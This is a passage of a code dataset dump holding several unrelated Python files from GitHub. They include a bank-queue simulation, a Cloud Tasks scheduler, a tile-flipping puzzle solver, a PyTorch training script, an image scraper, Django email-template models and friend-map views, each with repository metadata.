str(error))","repo_name":"Ted-18/Bot.Assistant-LevelSystem","sub_path":"LevelSystem/handlers/handlerSettings.py","file_name":"handlerSettings.py","file_ext":"py","file_size_in_byte":3656,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"49081284763","text":"\"\"\"This example is modified from the simpy's bank renege example; we\nuse the same settings as simpy so that we can get the same results.\"\"\"\n\nRANDOM_SEED = 42 # random seed for repeatability\nNUM_CUSTOMERS = 5 # total number of customers\nINTV_CUSTOMERS = 10.0 # mean time between new customers\nMEAN_BANK_TIME = 12.0 # mean time in bank for each customer\nMIN_PATIENCE = 1 # min customer patience\nMAX_PATIENCE = 3 # max customer patience\n\nimport simulus\nfrom random import seed, expovariate, uniform\n\ndef source():\n for i in range(NUM_CUSTOMERS):\n sim.process(customer, i)\n sim.sleep(expovariate(1.0/INTV_CUSTOMERS))\n\ndef customer(idx):\n arrive = sim.now\n print('%7.4f Customer%02d: Here I am' % (arrive, idx))\n\n patience = uniform(MIN_PATIENCE, MAX_PATIENCE)\n _, timedout = sim.wait(counter, patience)\n if timedout:\n print('%7.4f Customer%02d: RENEGED after %6.3f' %\n (sim.now, idx, sim.now-arrive))\n else:\n print('%7.4f Customer%02d: Waited %6.3f' %\n (sim.now, idx, sim.now-arrive))\n sim.sleep(expovariate(1.0/MEAN_BANK_TIME))\n print('%7.4f 
Customer%02d: Finished' % (sim.now, idx))\n counter.release()\n\nprint('Bank renege')\nseed(RANDOM_SEED)\nsim = simulus.simulator()\ncounter = sim.resource()\nsim.process(source)\nsim.run()\n","repo_name":"liuxfiu/simulus","sub_path":"examples/simpy/bank.py","file_name":"bank.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"79"} +{"seq_id":"42630551875","text":"from google.cloud import tasks_v2\nimport requests\nimport os\nimport json\nfrom google.cloud import datastore\nfrom flask import jsonify\n\nlocation_id = os.environ.get('LOCATION_ID', '')\nprojec_id = os.environ.get('PROJECT_ID', '')\nqueue_id = os.environ.get('QUEUE_ID', '')\nurl_function_consumidor = os.environ.get('URL_FUNCTION_CONSUMIDOR', '')\nurl_api_actualizar_pedido = os.environ.get('URL_API_ACTUALIZAR_PEDIDO', '')\n\nclient = tasks_v2.CloudTasksClient()\ndatastore_client = datastore.Client()\nkind = \"Agenda\"\n\n\ndef funcion_agendar_lotes(datos):\n\n print(location_id)\n print(projec_id)\n print(queue_id)\n print(url_function_consumidor)\n print(url_api_actualizar_pedido)\n\n data = datos.get_json(force=True)\n print(data)\n if data is None:\n return \"No se recibe información\", 400\n try:\n\n # Create an object to query the entity we will work with\n query = datastore_client.query(kind=kind)\n query.add_filter(\"estado\",\"=\",data['estado'])\n results = list(query.fetch())\n\n registros = jsonify(results)\n\n for registro in registros:\n\n print(\"Inicia Productor\") \n parent = client.queue_path(projec_id, location_id, queue_id)\n task = {\n \"http_request\": { \n \"http_method\": tasks_v2.HttpMethod.POST,\n \"url\": url_function_consumidor,\n \"headers\": {\n \"Content-type\": \"application/json\"\n },\n 'body':json.dumps({'id':registro['id'], 'operationId':'AGENDADO', 'pickupDate':registro['pickupDate'], 'deliveryDate':registro['deliveryDate']}).encode()\n }\n }\n response = client.create_task(parent= parent, task= task)\n\n return {\n 'message': 'Se crea la tarea envios los alpes de manera exitosa',\n 'name': response.name,\n 'http_request': {\n 'url' : response.http_request.url,\n 'http_method' : str(response.http_request.http_method)\n }\n } \n \n except:\n return \"Pedido No actualizado\", 404","repo_name":"mauricio-corredor/entrega_3","sub_path":"ApiFunctions/funcion_agendamiento_lotes/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"17171517241","text":"import copy\n\"\"\"When the order of flipping does not matter, operate so that the solution becomes uniquely determined.\n Note that Python functions receive lists by reference, so be careful.\"\"\"\n\n\ndef print_ans(height, width, ans, flip):\n if ans == -1:\n # no solution exists\n print(\"IMPOSSIBLE\")\n else:\n for i in range(height):\n for j in range(width):\n print(flip[i][j], end=\" \")\n print()\n\n\ndef change_tile(height, width, tile, h, w):\n tile[h][w] += 1 # flip the current tile\n if h - 1 >= 0:\n tile[h-1][w] += 1 # flip the tile above\n if h + 1 < height:\n tile[h + 1][w] += 1 # flip the tile below\n if w - 1 >= 0:\n tile[h][w - 1] += 1 # flip the tile to the left\n if w + 1 < width:\n tile[h][w + 1] += 1 # flip the tile to the right\n return tile\n\n\ndef cal_num(height, width, flip):\n num = 0\n for h in range(height):\n for w in range(width):\n num += flip[h][w]\n return num\n\n\ndef cal_fliptile(height, width, tile, flip):\n for h in range(1, height):\n for w in range(width):\n if tile[h-1][w] % 2 == 1:\n flip[h][w] = 1\n tile = change_tile(height, width, tile, h, w)\n\n # check whether all tiles are white\n 
for w in range(width):\n if tile[height - 1][w] % 2 == 1:\n # a black tile remains\n return -1, flip\n\n # number of flipped tiles\n num = cal_num(height, width, flip)\n return num, flip\n\n\ndef change_tile_0(height, width, tile, flip, w):\n if w < width:\n # deep copies to simulate pass-by-value\n tile1 = copy.deepcopy(tile)\n flip1 = copy.deepcopy(flip)\n tile2 = copy.deepcopy(tile)\n flip2 = copy.deepcopy(flip)\n\n num1, flip1 = change_tile_0(height, width, tile1, flip1, w+1)\n\n flip2[0][w] = 1\n tile2 = change_tile(height, width, tile2, 0, w)\n num2, flip2 = change_tile_0(height, width, tile2, flip2, w+1)\n\n # when solutions exist, return the smaller one\n if num1 < 0 and num2 < 0:\n return num2, flip2\n elif num1 > 0 and num2 < 0:\n return num1, flip1\n elif num1 < 0 and num2 > 0:\n return num2, flip2\n else:\n if num1 < num2:\n return num1, flip1\n else:\n return num2, flip2\n\n else:\n # once the first row is fixed\n copy_flip = copy.deepcopy(flip)\n copy_tile = copy.deepcopy(tile)\n num, copy_flip = cal_fliptile(height, width, copy_tile, copy_flip)\n return num, copy_flip\n\n\ndef main():\n # input and initialization\n height = int(input())\n width = int(input())\n tile = [[] for j in range(height)]\n flip = [[0 for i in range(width)] for j in range(height)]\n for i in range(height):\n tile[i] = [int(i) for i in input().split()]\n\n num, flip = change_tile_0(height, width, tile, flip, 0)\n print_ans(height, width, num, flip)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Tomoki-Kikuta/ari_book","sub_path":"intermediate/python/fliptile.py","file_name":"fliptile.py","file_ext":"py","file_size_in_byte":3080,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"40037337741","text":"from dataloader import inaturalist\nfrom model import Classifier\nimport torch.nn as nn\nimport torch.optim as optim\nimport os\nimport time\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torchsummary import summary\n\n# to import a pretrained model for testing\nimport torchvision.models\n\n# Sections to Fill: Define Loss function, optimizer and model, Train and Eval functions and the training loop\n\n############################################# DEFINE HYPERPARAMS #####################################################\n# Feel free to change these hyperparams based on your machine's capacity\nbatch_size = 32\nepochs = 20\nlearning_rate = 0.001\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n# device = 'cpu'\n\n############################################# DEFINE DATALOADER #####################################################\ntrainset = inaturalist(root_dir='../nature_12K/inaturalist_12K', mode='train')\nvalset = inaturalist(root_dir='../nature_12K/inaturalist_12K', mode = 'val')\n# trainset = inaturalist(root_dir='../monkey_dataset', mode='train')\n# valset = inaturalist(root_dir='../monkey_dataset', mode = 'val')\n\ntrainloader = DataLoader(trainset, batch_size=batch_size, shuffle=True, num_workers=2)\nvalloader = DataLoader(valset, batch_size=1, shuffle=False, num_workers=2)\n\n################################### DEFINE LOSS FUNCTION, MODEL AND OPTIMIZER ######################################\n# USEFUL LINK: https://pytorch.org/docs/stable/nn.html#loss-functions\n#---Define the loss function to use, model object and the optimizer for training---#\n\n# number of image classes\nno_of_classes=10\n# cross entropy loss is better for classification problems\nloss_fn=nn.CrossEntropyLoss()\n# .to(device) --> use cuda if available, otherwise cpu\n# 
model=Classifier(no_of_classes).to(device)\nmodel=torchvision.models.resnet50(weights=None) # ResNet-50 backbone; weights=None means randomly initialized (no ImageNet weights loaded)\nno_features=model.fc.in_features\nmodel.fc=nn.Linear(no_features, no_of_classes)\nmodel=model.to(device)\n\n# usual momentum=0.9 to converge faster\n# optimizer=optim.SGD(model.parameters(), lr=learning_rate, momentum=0.9, weight_decay=0.03)\noptimizer = optim.Adam(model.parameters(), lr=0.001, weight_decay=0.0001)\n\n# Path for checkpoint\npath='./checkpoints/checkpoints.pt'\n\n################################### CREATE CHECKPOINT DIRECTORY ####################################################\n# NOTE: If you are using Kaggle to train this, remove this section. Kaggle doesn't allow creating new directories.\ncheckpoint_dir = 'checkpoints'\nif not os.path.isdir(checkpoint_dir):\n os.makedirs(checkpoint_dir)\n\n#################################### HELPER FUNCTIONS ##############################################################\n\ndef get_model_summary(model, input_tensor_shape):\n summary(model, input_tensor_shape)\n print(\"\\n\\n\")\n\ndef train(model, dataset, optimizer, criterion, device, best_accuracy, epoch_now):\n model.train()\n correct=0\n total=0\n for img_data in dataset:\n img, label=img_data\n img=img.to(device)\n label=label-1\n label=label.to(device)\n \n # IMP\n # set gradients to zero\n optimizer.zero_grad()\n \n # current output after training\n output=model(img)\n \n total+=label.size(0)\n _, predicted = torch.max(output.data, 1)\n \n correct+=(predicted == label).sum().item()\n # print(predicted, label)\n # print(correct, total)\n \n # compute loss\n loss=criterion(output, label)\n # backpropagation\n loss.backward()\n # Performs a single optimization step (parameter update)\n optimizer.step()\n \n accuracy=100.00*correct/total\n print(\"Accuracy in Training :\" +str(accuracy))\n \n if accuracy > best_accuracy:\n best_accuracy=accuracy\n torch.save({\n 'epoch': epoch_now,\n 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict()\n }, path)\n print(\"Checkpoint saved\")\n print(\"Best Accuracy till now:\" +str(best_accuracy)+\"\\n\") \n \n return best_accuracy \n \n \ndef eval(model, dataset, device):\n model.eval()\n correct=0\n total=0\n with torch.no_grad():\n for img_data in dataset:\n img, label=img_data\n img=img.to(device)\n label=label-1\n label=label.to(device)\n \n # set gradients to zero\n optimizer.zero_grad()\n \n # current output after evaluating\n output=model(img)\n \n total+=label.size(0)\n _, predicted = torch.max(output.data, 1)\n correct+=(predicted == label).sum().item()\n # print(predicted, label)\n # print(correct, total)\n \n accuracy=100.00*correct/total\n print(\"Accuracy in Evaluation:\" +str(accuracy)) \n \n\ndef epoch_time(start_time, end_time):\n elapsed_time = end_time - start_time\n elapsed_mins = int(elapsed_time / 60)\n elapsed_secs = int(elapsed_time - (elapsed_mins * 60))\n return elapsed_mins, elapsed_secs\n\n################################################### TRAINING #######################################################\n\n#Training and Validation\nbest_valid_loss = float('inf')\n\ndef main():\n # Get model Summary\n get_model_summary(model, (3, 256, 256))\n \n # curr_epoch=0\n best_accuracy=0\n for epoch in range(epochs):\n start_time = time.monotonic()\n \n #------YOUR CODE HERE-----#\n print(\"Epoch \"+str(epoch+1))\n if os.path.exists(path):\n checkpoint = torch.load(path)\n model.load_state_dict(checkpoint['model_state_dict'])\n 
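# Hedged note (added commentary, not in the original file): train() above saves this checkpoint via torch.save with the keys 'epoch', 'model_state_dict' and 'optimizer_state_dict', so restoring the optimizer state below also resumes Adam's running moment estimates.\n 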
optimizer.load_state_dict(checkpoint['optimizer_state_dict'])\n curr_epoch = checkpoint['epoch']\n # print(\"Epoch saved upto \"+str(curr_epoch))\n print(\"Checkpoint is loaded\\n\")\n best_accuracy=train(model, trainloader, optimizer, loss_fn, device, best_accuracy, epoch+1)\n eval(model, valloader, device)\n\n end_time = time.monotonic()\n epoch_mins, epoch_secs = epoch_time(start_time, end_time)\n\n print(\"TIME TAKEN FOR THE EPOCH {}: {} mins and {} seconds\\n\\n\".format(epoch+1, epoch_mins, epoch_secs))\n\n print(\"OVERALL TRAINING COMPLETE\")\n \nif __name__ == '__main__':\n main()","repo_name":"sanjaysj6282/Image_classification_pytorch","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"25910671026","text":"from utilities.FE_utilities import * \nfrom utilities.scores import * \nfrom utilities.models import *\n\n\n\ndef pipeline_for_cleaning(df):\n df= log_transfrom_columns(df)\n df= decide_peak_period(df,[\"date_end\",\"date_renewal\"])\n x= df.id\n drop_columns(df)\n df[\"id\"]= x\n df= one_hot_encoding(df,catFeatures=[\"channel_sales\",\"origin_up\"])\n return df \n\n\n\ndef simple_pipeline(df,sampling_type=1):\n '''\n apply log transformation to skewed columns \n extract peak periods \n drop the unused columns \n - split the data \n then normalize \n apply upsampling, downsampling or none depending on sampling_type\n '''\n df= log_transfrom_columns(df)\n df= extract_date_info(df)\n df= decide_peak_period(df,[\"date_end\",\"date_renewal\"])\n drop_columns(df)\n df= one_hot_encoding(df,catFeatures=[\"channel_sales\",\"origin_up\"])\n X_train, X_test, y_train, y_test= split_x_y(df)\n \n X_train, X_test= normalize(X_train, X_test)\n \n \n X_train,y_train = sampling(X_train,y_train,sampling_type)\n\n \n return X_train, X_test, y_train, y_test\n\n\n\ndef simple_pipeline_cleaned_data(df,sampling_type=1):\n '''\n for cleaned dataframes \n - split \n - normalize \n - sampling\n '''\n \n X_train, X_test, y_train, y_test= split_x_y(df) \n X_train, X_test= normalize(X_train, X_test)\n \n \n X_train,y_train = sampling(X_train,y_train,sampling_type)\n\n return X_train, X_test, y_train, y_test\n\n\n\n\n\n\n\n\ndef division_pipeline(df):\n drop_columns(df)\n df= one_hot_encoding(df,catFeatures=[\"channel_sales\",\"origin_up\"])\n \n \n \n X_train, X_test, y_train, y_test= split_x_y(df)\n X_train, X_test= normalize_min_max(X_train, X_test)\n\n return X_train, X_test, y_train, y_test\n","repo_name":"ahmedtarek1325/Day-BCG_PowerCompany_churn","sub_path":"pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"27453283720","text":"import os\nimport pandas as pd\nimport numpy as np\n\n\ndef triang(start, mid, stop, equal=False):\n \"\"\"\n Calculates a triangular window of the given size. Taken from\n https://github.com/CPJKU/onset_detection/blob/master/onset_program.py\n\n :param start: starting bin (with value 0, included in the returned filter)\n :param mid: center bin (of height 1, unless equal is True)\n :param stop: end bin (with value 0, not included in the returned filter)\n :param equal: normalize the area of the filter to 1 [default=False]\n :return a triangular shaped filter\n\n \"\"\"\n # height of the filter\n height = 1.\n # normalize the height\n if equal:\n height = 2. 
/ (stop - start)\n # init the filter\n triang_filter = np.empty(stop - start)\n # rising edge\n triang_filter[:mid - start] = np.linspace(0, height, (mid - start), endpoint=False)\n # falling edge\n triang_filter[mid - start:] = np.linspace(height, 0, (stop - mid), endpoint=False)\n # return\n return triang_filter\n\n\ndef mel_filterbank(num_bands, fft_size, sample_rate):\n \"\"\"\n Returns a filter matrix for a Mel filter bank.\n\n :param num_bands: number of filter bands\n :param fft_size: number of fft bins\n :param sample_rate: sample rate\n :return filterbank matrix\n \"\"\"\n\n freq_vector = np.asarray([x * sample_rate / fft_size for x in range(0, fft_size)])\n\n frequencies = np.asarray([2595.0 * np.log10(1.0 + f / 700.0) for f in freq_vector])\n\n max_f = np.max(frequencies)\n min_f = np.min(frequencies)\n\n mel_bin_width = (max_f - min_f) / num_bands\n filterbank = np.zeros((fft_size, num_bands), dtype=float)\n\n for i in range(num_bands):\n\n idx_filter_1 = np.where(frequencies >= (i-1)*mel_bin_width + min_f)\n idx_filter_2 = np.where(frequencies <= (i+1)*mel_bin_width + min_f)\n idx_filter = np.intersect1d(idx_filter_1, idx_filter_2)\n\n if idx_filter.size == 0:\n continue\n\n start_idx = idx_filter[0]\n end_idx = idx_filter[-1]\n mid_idx = start_idx + (end_idx - start_idx) // 2\n\n win = triang(start_idx, mid_idx, end_idx)\n filterbank[start_idx:start_idx+win.size, i] = win\n\n # return the filterbank matrix\n return filterbank\n\n\ndef get_segment_times(audio_file, annotation_folder):\n \"\"\"\n Read segment start times from annotation file.\n :param audio_file: path to audio file\n :param annotation_folder: folder where annotations from SALAMI are stored\n :return: segment start times in seconds\n \"\"\"\n\n file_name = os.path.splitext(os.path.basename(audio_file))[0]\n\n # for some tracks, only one annotation is available, take first one as default\n # if there is no annotation available, store -1 as error code\n try:\n label_file = os.path.join(annotation_folder, file_name, 'parsed', 'textfile1_uppercase.txt')\n t = pd.read_table(label_file, header=None)\n except IOError:\n try:\n label_file = os.path.join(annotation_folder, file_name, 'parsed', 'textfile2_uppercase.txt')\n t = pd.read_table(label_file, header=None)\n except IOError:\n return -1\n\n segment_times = t.iloc[:, 0].values\n\n return segment_times\n\ndef get_beat_times(audio_file, beats_folder, include_beat_numbers=False):\n \"\"\"\n Read beat times from annotation file.\n :param audio_file: path to audio files\n :param beats_folder: folder with preanalysed beat times (in .beats.txt format per track)\n :return: beat times in seconds\n \"\"\"\n\n file_name = os.path.splitext(os.path.basename(audio_file))[0]\n beats_file = os.path.join(beats_folder, file_name + '.beats.txt')\n\n if not os.path.isfile(beats_file):\n print(f\"Extracting beat times for {audio_file}\")\n os.system(f\"DBNDownBeatTracker single '{audio_file}' -o '{beats_file}'\")\n\n t = pd.read_table(beats_file, header=None)\n\n if include_beat_numbers:\n return t[0].values, t[1].values\n else:\n return t[0].values\n\n","repo_name":"mleimeister/SegmentationCNN","sub_path":"Python/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3985,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"7"} +{"seq_id":"74340224544","text":"#!/usr/bin/env python\n\nimport sys\n\ndef tracer(frame, event, arg):\n if event == 'call':\n print(frame.f_code.co_name)\n print(frame.f_code.co_code)\n return None\n\ndef 
parent():\n for i in range(3):\n child()\n return 'parent done'\n\ndef child():\n for i in range(5):\n print('in child loop')\n return 'child done'\n\nif __name__ == '__main__':\n sys.settrace(tracer)\n parent()\n sys.settrace(None)\n","repo_name":"toffer/talk-custom-tracing","sub_path":"examples/scripts/print_bytestring.py","file_name":"print_bytestring.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71156807584","text":"\n# coding: utf-8\n\nimport sys\nimport os\nimport urllib.request\nimport urllib.error\nfrom bs4 import BeautifulSoup\n\n# url to parse\n#url_to_parse = 'https://rocjoker0120.artstation.com/'\n# in this directory will be created folder where all images will be saved\n#dir_for_save = 'C:\\\\Users\\\\Michael\\\\Desktop\\\\Collages'\n\n\ndef image_downloader(url_to_parse, dir_for_save=os.getcwd()):\n sauce = urllib.request.urlopen(url_to_parse)\n soup = BeautifulSoup(sauce, 'lxml')\n\n artist_dir = url_to_parse.split('//')[1].split('.')[0]\n new_cwd = dir_for_save + '\\\\' + artist_dir\n if not os.path.exists(new_cwd):\n os.makedirs(new_cwd)\n os.chdir(new_cwd)\n\n # will print image number\n img_number = 1\n for url in soup.find_all('a'):\n #print(url.get('href'))\n # get artist projects page and collect links\n cur_url = url.get('href')\n if cur_url.find('projects') != -1:\n if url_to_parse.find('projects') == -1:\n project_url = url_to_parse + cur_url\n else:\n project_url = url_to_parse + '/' + cur_url.split('/')[-1]\n print(project_url)\n try:\n sauce = urllib.request.urlopen(project_url)\n except urllib.error.HTTPError as err:\n print(err.code)\n soup = BeautifulSoup(sauce, 'lxml')\n imgs = soup.find_all(\"img\") \n for img in imgs:\n #print(img.get('src'))\n img_url = img.get('src')\n if img_url.find('large') != -1:\n img_name = project_url.split('/')[-1] + '-' + img_url.split(\"/\")[-1].split(\"?\")[0]\n print(str(img_number) + '. ' + img_name)\n try:\n urllib.request.urlretrieve(img_url, img_name)\n img_number = img_number + 1\n except urllib.error.HTTPError as err:\n print(err.code)\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 2:\n url_to_parse = sys.argv[1]\n image_downloader(url_to_parse)\n elif len(sys.argv) > 2:\n url_to_parse = sys.argv[1]\n dir_for_save = sys.argv[2]\n image_downloader(url_to_parse, dir_for_save)\n else:\n print('\\nPlease specify two arguments:\\n1. URL to artist projects page\\n2. 
Path to directory where you want to save folder with downloaded images\\n *if only URL is given folder with images will be created in current directory')\n\n","repo_name":"GhostCatcg/artstation_images_downloader","sub_path":"artstation_image_downloader.py","file_name":"artstation_image_downloader.py","file_ext":"py","file_size_in_byte":2448,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"35981995962","text":"from timer import timer\n\n\ndef load_dictionary(filename):\n with open(filename) as file:\n words = file.read().splitlines()\n return {k: None for k in words}\n\n\ndef english_count(sentence: str):\n dictionary = load_dictionary('dictionary.txt')\n split_sentence = [word.upper() for word in sentence.split(' ')]\n matches = 0\n for word in split_sentence:\n if word in dictionary:\n matches += 1\n return matches\n\n\n@timer\ndef is_english(sentence: str):\n matches = english_count(sentence)\n percentage = float(matches) / len(sentence.split(' ')) * 100\n print(f'{percentage}% of the words in the sentence are English.')\n\n\nis_english('This is my sentence sentence')\n","repo_name":"adamhartleb/cracking_codes","sub_path":"detect_english.py","file_name":"detect_english.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"33197942748","text":"import operator\nfrom datetime import timedelta, datetime\nfrom functools import reduce\n\nfrom pomodorr.frames.exceptions import DateFrameException as DFE\nfrom pomodorr.frames.selectors.date_frame_selector import get_breaks_inside_date_frame, get_pauses_inside_date_frame\n\n\nclass DurationCalculatorLoader:\n def __init__(self, date_frame_object, end: datetime) -> None:\n self._date_frame_model = date_frame_object.__class__\n\n if date_frame_object.frame_type == self._date_frame_model.pomodoro_type:\n self._calculator_strategy = PomodoroDurationCalculator(date_frame_object=date_frame_object, end=end)\n elif date_frame_object.frame_type == self._date_frame_model.break_type:\n self._calculator_strategy = BreakDurationCalculator(date_frame_object=date_frame_object, end=end)\n elif date_frame_object.frame_type == self._date_frame_model.pause_type:\n self._calculator_strategy = PauseDurationCalculator(date_frame_object=date_frame_object, end=end)\n else:\n raise DFE(DFE.messages[DFE.invalid_date_frame_type])\n\n def calculate(self) -> timedelta:\n return self._calculator_strategy.get_duration()\n\n\nclass DurationCalculator:\n def __init__(self, date_frame_object, end: datetime) -> None:\n self._date_frame_object = date_frame_object\n self._date_frame_model = self._date_frame_object.__class__\n self._end = end\n\n def get_duration(self) -> timedelta:\n return self._end - self._date_frame_object.start\n\n\nclass PomodoroDurationCalculator(DurationCalculator):\n def get_duration(self) -> timedelta:\n whole_frame_duration = self._end - self._date_frame_object.start\n breaks_duration = self.get_breaks_duration()\n pauses_duration = self.get_pauses_duration()\n return whole_frame_duration - breaks_duration - pauses_duration\n\n def get_breaks_duration(self) -> timedelta:\n break_frames = get_breaks_inside_date_frame(\n date_frame_object=self._date_frame_object, end=self._end).values('start', 'end')\n breaks_duration = reduce(operator.add,\n (break_frame['end'] - break_frame['start'] for break_frame in break_frames),\n timedelta(0))\n return breaks_duration\n\n def get_pauses_duration(self) -> 
timedelta:\n pause_frames = get_pauses_inside_date_frame(\n date_frame_object=self._date_frame_object, end=self._end).values('start', 'end')\n pauses_duration = reduce(operator.add,\n (pause_frame['end'] - pause_frame['start'] for pause_frame in pause_frames),\n timedelta(0))\n return pauses_duration\n\n\nclass BreakDurationCalculator(DurationCalculator):\n pass\n\n\nclass PauseDurationCalculator(DurationCalculator):\n pass\n","repo_name":"kamil559/Pomodorr_backend_v1","sub_path":"pomodorr/frames/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"2406830994","text":"import pytest\nfrom config import log\nfrom test_helpers import fetch\n\ndef pytest_addoption(parser):\n parser.addoption(\n '--count',\n default=1,\n type='int',\n metavar='count',\n help='Run each test the specified number of times')\n\ndef pytest_generate_tests(metafunc):\n for _i in range(metafunc.config.option.count):\n metafunc.addcall()\n\n@pytest.fixture(scope=\"function\")\ndef log_test_start(request):\n log.debug(\"[%s] start\" % request.function.__name__)\n # Mark test start in nginx.log\n fetch(\"/psol_test_start_%s\" % request.function.__name__, method = \"HEAD\",\n allow_error_responses = True)\n def log_test_end():\n # Mark test end in nginx.log\n log.debug(\"[%s] end\\n\\n\" % request.function.__name__)\n fetch(\"/psol_test_end_%s\" % request.function.__name__, method = \"HEAD\",\n allow_error_responses = True)\n\n request.addfinalizer(log_test_end)\n","repo_name":"We-Amp/psol_pytest","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"12659082734","text":"from typing import List\n\nfrom ckeditor.fields import RichTextField\nfrom django.conf import settings\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.db import models\nfrom model_utils.models import TimeStampedModel\n\nfrom .custom_templates import get_full_copy_template\nfrom .sendgrid import mass_send_personalized_mail, send_personalized_mail\nfrom .utils import attach_files, random_name_in\n\n\nclass EmailTemplate(TimeStampedModel):\n name = models.CharField(\n max_length=255,\n unique=True,\n help_text=\"Unique name used to identify this message\",\n )\n\n # SendGrid\n sendgrid_template_id = models.CharField(\n max_length=255,\n blank=True,\n null=True,\n )\n\n # Core\n subject = models.CharField(\n max_length=255, blank=True, null=True, help_text=\"Email subject line\"\n )\n html_content = RichTextField(\n blank=True,\n help_text=\"Text that will be inputted into Template html version\",\n null=True,\n )\n plain_text_content = RichTextField(\n blank=True,\n help_text=\"Text that will be inputted into Template plain text version\",\n )\n\n class Meta:\n ordering = [\"-id\"]\n\n def send_via_sendgrid(self, personalization, attachments=[]):\n if not self.sendgrid_template_id:\n raise Exception(\"SendGrid template ID required to send message via SendGrid\")\n send_personalized_mail(self, personalization, attachments)\n\n def mass_send_via_sendgrid(self, personalizations):\n if not self.sendgrid_template_id:\n raise Exception(\"SendGrid template ID required to send message via SendGrid\")\n mass_send_personalized_mail(self, personalizations)\n\n def send(\n self,\n recipients: List[str],\n context={},\n use_base_template=False,\n extended_with=\"\",\n 
attachments=[],\n ):\n if not self.html_content:\n raise Exception(\"HTML content required to send e-mail\")\n\n if not use_base_template:\n base_template_route = \"\"\n else:\n base_template_route = extended_with or settings.DEFAULT_EMAIL_TEMPLATE\n\n html_content, text_content, subject = get_full_copy_template(\n self, context, use_base_template, base_template_route\n )\n\n mail = EmailMultiAlternatives(\n subject, text_content, from_email=settings.DEFAULT_FROM_EMAIL, to=recipients\n )\n\n # combine static attachments from template with dynamic attachments\n mail.attach_alternative(html_content, \"text/html\")\n all_attachments = list(self.static_attachments.all()) + attachments\n attach_files(mail, all_attachments)\n\n mail.send()\n\n\nclass Attachment(TimeStampedModel):\n template = models.ForeignKey(\n EmailTemplate,\n related_name=\"static_attachments\",\n null=False,\n on_delete=models.CASCADE,\n )\n file = models.FileField(upload_to=random_name_in(\"copy_template_file\"))\n filename = models.CharField(\n max_length=255,\n blank=True,\n null=True,\n )\n","repo_name":"silverlogic/baseapp-backend","sub_path":"baseapp-email-templates/baseapp_email_templates/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3087,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"74810811102","text":"from json import (dumps, loads)\nfrom django.contrib.auth import (authenticate, logout, login)\nfrom django.http import (HttpResponse)\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.views.decorators.csrf import (csrf_exempt)\nfrom friendmap.controller import (add_user, get_users, get_friends, add_friend, get_all_connections)\n\n\n@csrf_exempt\ndef users(request):\n if request.method == 'GET':\n username = request.GET.get('username', None)\n if username:\n response = get_users(username=username)\n else:\n response = []\n return HttpResponse(dumps(response))\n elif request.method == 'POST':\n username = _get_post_param(param='username', request=request)\n password = _get_post_param(param='password', request=request)\n response = add_user(username=username, password=password)\n return HttpResponse(dumps(response))\n\n@csrf_exempt\ndef friends(request):\n if request.user is None:\n return HttpResponse(status=401)\n if request.method == 'GET':\n response = get_friends(user=request.user)\n return HttpResponse(dumps(response))\n elif request.method == 'POST':\n friend_name = _get_post_param(param='username', request=request)\n add_friend(user=request.user, friend_name=friend_name)\n return HttpResponse(status=200)\n\n@csrf_exempt\ndef whoami(request):\n if request.user is None:\n return HttpResponse(status=401)\n else:\n response = request.user.username\n return HttpResponse(dumps(response))\n\n\n@csrf_exempt\ndef all_connections(request):\n if request.user.is_superuser:\n response = get_all_connections()\n return HttpResponse(dumps(response))\n else:\n return HttpResponse(status=401)\n\n@csrf_exempt\ndef login_user(request):\n if request.method == 'POST':\n username = _get_post_param(param='username', request=request)\n password = _get_post_param(param='password', request=request)\n user = authenticate(username=username, password=password)\n if user is not None:\n if user.is_active:\n login(request, user)\n return HttpResponse(username)\n else:\n return HttpResponse(status=401)\n else:\n return HttpResponse(status=400)\n\n\n@csrf_exempt\ndef logout_user(request):\n 
